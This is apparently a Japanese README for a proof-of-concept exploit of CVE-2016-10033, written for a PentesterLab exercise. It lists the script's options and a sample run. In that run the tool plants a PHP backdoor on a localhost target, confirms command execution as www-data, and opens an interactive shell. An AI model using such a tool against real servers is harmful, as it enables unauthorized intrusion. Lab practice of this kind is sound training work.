
PentesterLab用に作成したCVE-2016-10033のPoC
PentesterLab用に書きました
PentesterLabの関係者ならズルをしないでください。自分で学ぶ方がずっと良いです。
誰かの役に立てば嬉しいです。役に立たなくても、将来の自分には役立つでしょう :)
インタラクティブシェル付き、便利なargparse機能もあり
usage: poc.py [-h] [--target TARGET] [--backdoor BACKDOOR] [--proxy] [--raw] [--no-color]
options:
-h, --help show this help message and exit
--target TARGET Target URL
--backdoor BACKDOOR Backdoor path
--proxy Use local proxy
--raw Show raw output
--no-color Disable colored output
$ python3 poc.py --target http://localhost:8000 --proxy
[+] Using random backdoor name: caxvcs009f.php
[+] Sending exploit to target...
[+] Testing backdoor...
[+] Backdoor working! Test output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
www-data